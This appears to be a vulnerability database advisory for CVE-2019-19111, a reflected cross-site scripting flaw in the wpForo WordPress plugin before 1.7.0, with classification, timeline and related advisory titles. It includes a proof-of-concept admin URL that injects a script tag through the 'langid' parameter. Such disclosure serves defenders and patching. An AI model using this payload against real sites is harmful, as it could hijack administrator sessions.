wpForo < 1.7.0 – Reflected Cross-Site Scripting (XSS) via langid Parameter | CVE 2019-19111

Description

The plugin did not escape, validate or escape the 'langid' GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in admin

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpforo-phrases&ids&action=-1&langid="><script>alert(/XSS/)</script>&phrase_package=0&paged=1&action2=-1

Affects Plugins

wpforo

Fixed in 1.7.0

References

CVE

CVE-2019-19111

URL

https://wpforo.com/community/wpforo-announcements/wpforo-1-7-0-is-released/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

7.1 (high)

Miscellaneous

Original Researcher

Yann Faure (Sh0ckFR)

Verified

WPVDB ID

405709da-8eb7-4525-9f1e-850e4d291bab

Timeline

Publicly Published

2020-05-04 (about 6 years ago)

Added

2021-06-29 (about 4 years ago)

Last Updated

2021-07-18 (about 4 years ago)

Other

Published

Title

Published

2025-05-19

Title

SKT Blocks < 2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-08

Title

Postify: Post Layout For Elementor <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-04-19

Title

PropertyHive <= 1.5.48 - Reflected XSS

Published

2025-12-11

Title

Like DisLike Voting <= 1.0.1 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']

Published

2021-03-26

Title

Patreon WordPress < 1.7.2 - Reflected XSS on patreon_save_attachment_patreon_level AJAX action